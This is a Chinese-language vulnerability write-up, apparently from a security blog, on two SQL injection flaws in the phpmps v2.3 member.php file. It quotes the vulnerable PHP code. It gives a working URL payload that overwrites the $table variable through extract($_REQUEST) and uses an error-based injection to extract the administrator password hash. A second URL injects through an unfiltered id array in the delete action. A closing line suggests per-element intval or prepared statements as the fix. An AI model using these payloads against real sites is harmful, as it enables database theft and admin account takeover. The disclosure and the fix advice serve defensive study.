phpmps_v2.3最新版两处SQL注入漏洞

member.php 422 - 455 [php] case 'exchange': $units = array('gold'=>'枚', 'money'=>'元', 'credit'=>'分'); $types = array('money'=>'资金', 'gold'=>'信息币', 'credit'=>'积分'); $notes = array('login'=>'登陆积分', 'post_info_credit'=>'发布信息积分' ,'post_comment_credit'=>'发布评论积分' ,'info_refer'=>'一键更新信息' ,'info_top'=>'信息置顶' , 'credit2gold'=>'积分兑换信息币', 'money2gold'=>'资金购买信息币'); extract($_REQUEST); $page = isset($page) ? intval($page) : 1; $pagesize = 20; $sql = ''; if($type) $sql .= " AND type='$type' "; if($begindate) { $begintime = strtotime($begindate.' 00:00:00'); $sql .= " AND addtime>=$begintime "; } if($enddate) { $endtime = strtotime($enddate.' 23:59:59'); $sql .= " AND addtime<=$endtime"; } $r = $db->getOne("SELECT count(*) as number FROM {$table}pay_exchange WHERE username='$_username' $sql"); $pager['search'] = array('act' => 'exchange'); $pager = get_pager('member.php', $pager['search'], $r, $page, $pagesize); $exchanges = array(); $result = $db->query("SELECT * FROM {$table}pay_exchange WHERE username='$_username' $sql ORDER BY exchangeid DESC LIMIT $pager[start],$pager[size]"); while($r = $db->fetchrow($result)) { $r['unit'] = $units[$r['type']]; $r['type'] = $types[$r['type']]; $r['note'] = !empty($notes[$r['note']]) ? $notes[$r['note']] : $r['note']; $r['addtime'] = date('Y-m-d h:i:s', $r['addtime']); $exchanges[] = $r; } $seo['title'] = '交易详情'; include template('member_exchange'); break; [/php] 上面的代码使用了extract($_REQUEST); 导致我们可以覆盖任意变量,通过覆盖变量$table可以构造注入 利用如下: [php] http://www.0day5.com/phpmps/member.php?act=check_info_gold&table=phpmps_member%20where%201=1%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28select%20password%20from%20phpmps_admin%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23 [/php] SQL漏洞2: member.php 741 - 746 SQL http://www.0day5.com/phpmps/member.php?act=delete&id[]=1a [php] case 'delete': $id = is_array($_REQUEST['id']) ? 
join(',', $_REQUEST['id']) : intval($_REQUEST['id']); if(empty($id))showmsg('没有选择记录'); $db->query("DELETE FROM {$table}comment WHERE id IN ($id)"); showmsg('删除成功', 'member.php?act=info_comment'); break; [/php] 这里$id为数组时只是用join简单拼接,并没有对每个元素做intval过滤(只有非数组分支做了intval),因此提交数组即可注入。如:http://www.0day5.com/phpmps/member.php?act=delete&id[]=1a 。修复时应对数组中的每个元素逐项intval(例如array_map('intval', ...)),或改用预处理语句。
